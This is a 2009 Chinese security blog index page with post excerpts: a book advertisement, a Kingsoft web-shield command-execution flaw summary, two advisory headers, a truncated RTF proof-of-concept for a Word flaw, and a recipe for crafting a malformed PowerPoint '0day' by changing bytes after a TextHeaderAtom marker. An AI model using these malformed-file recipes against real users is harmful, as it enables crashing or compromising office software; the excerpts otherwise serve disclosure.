鬼仔's Blog

# 鬼仔注：帮朋友打下广告，希望大家不要介意。这本书是 冰的原点 写的，lcx写的序。

官方连接：http://www.nohack.cn/bbs/thread-96363-1-1.html

新书预告＜黑客渗透笔记＞快赏
阅读全文 »

作者：inking

描述：

由于金山网盾对恶意地址的处理不严，攻击者通过构造一个普通的挂马页面和一个特殊的URL，可以使操作系统执行任何命令。

受影响的系统：

截至本文发布起的当前最新版本及其之前版本。
阅读全文 »

应该有朋友发现今天一直访问不了这里。

中午打开电脑时，就看到有朋友留言问我站是不是被和谐了，但是当时我这里访问没问题，后来有朋友告诉我，dnspod的NS服务器出问题了，我现在用的就是dnspod，朋友说dnspod是从昨天晚上开始出现问题的，我看了下，是被D了：
阅读全文 »

来源：幻影邮件列表

发布时间：2009-5-18
更新时间：2009-5-18
严重程度：高
威胁程度：控制远程主机
错误类型：边界检查错误
利用方式：主机模式
阅读全文 »

来源：幻影邮件列表

发布时间：2009-5-18
更新时间：2009-5-18
严重程度：高
威胁程度：控制远程主机
错误类型：逻辑错误
利用方式：主机模式
阅读全文 »

作者：wordexp

这个doc的要利用有一定难度:

poc如下:

{\rtf1\ansi\ansicpg409\deff0\deflang1033
{\fonttbl{\f0\fmodern\fprq6\fcharset0 DOTUM;}}
{\stylesheet\stylesheet\stylesheet\stylesheet\………\stylesheet……………..{hi.baidu.com/wordexp\par }}
阅读全文 »

作者：wordexp

ppt “0day”构造方式:新键个PPT,找9f 0f 04 00 00 00,把后面的一字节改为03 00 00 00
TextHeaderAtom (3999,9f0f,atom)：这个记录表示后的文字原子的意义（可以用来区分文字是否分隔成不同块）
值 名称       说明
0 TITLE            母版标题栏文本.
1 BODY            母版正文栏文本.
2 NOTES          注解文本.
4 OTHER         任何其它文本
5 CENTERBODY   正文栏文件.
6 CENTERTITLE   标题栏文本.
7 HALFBODY        表格中的文本?Half-sized body placeholder shape text.
8 QUARTERBODY Quarter-sized body placeholder shape text.

####
# #####
#### # #####
####### ### ######
####### ###### #######
######### ####### ########
##################### #########
#### ######### ########## ####
#### ###### ####### ####
#### #### #### ####
#### # #####
######## ###### ######
阅读全文 »